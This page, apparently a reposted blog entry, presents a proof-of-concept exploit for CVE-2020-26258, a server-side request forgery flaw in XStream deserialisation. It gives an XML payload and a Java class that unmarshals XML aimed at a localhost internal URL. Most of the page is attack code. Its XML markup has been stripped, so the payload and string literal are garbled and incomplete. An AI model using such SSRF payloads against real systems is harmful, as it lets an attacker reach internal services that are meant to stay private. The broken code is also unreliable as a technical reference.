CVE-2020-26258 XStream SSRF

# CVE-2020-26258 XStream SSRF

PoC:

“`



0



http://localhost:8080/internal/:


0


test

XStream xstream = new XStream();
xstream.fromXML(xml);
“`

**CVE_2020_26258.java**

“`java
import com.thoughtworks.xstream.XStream;

/*
CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling
with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.

All versions until and including version 1.4.14

https://x-stream.github.io/CVE-2020-26258.html

Security framework of XStream not explicitly initialized, using predefined black list on your own risk.

*/

public class CVE_2020_26258 {
public static void main(String[] args) {
String ssrf_xml = “

\n” +
\n” +
\n” +
0\n” +
\n” +
\n” +
\n” +
http://localhost:8989/internal/:\n” +
\n” +
\n” +
\n” +
0\n” +
\n” +
\n” +
test\n” +
\n” +

“;

XStream xstream = new XStream();
xstream.fromXML(ssrf_xml);

}
}
“`

ref:

https://raw.githubusercontent.com/jas502n/CVE-2020-26259/main/CVE_2020_26258.java

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容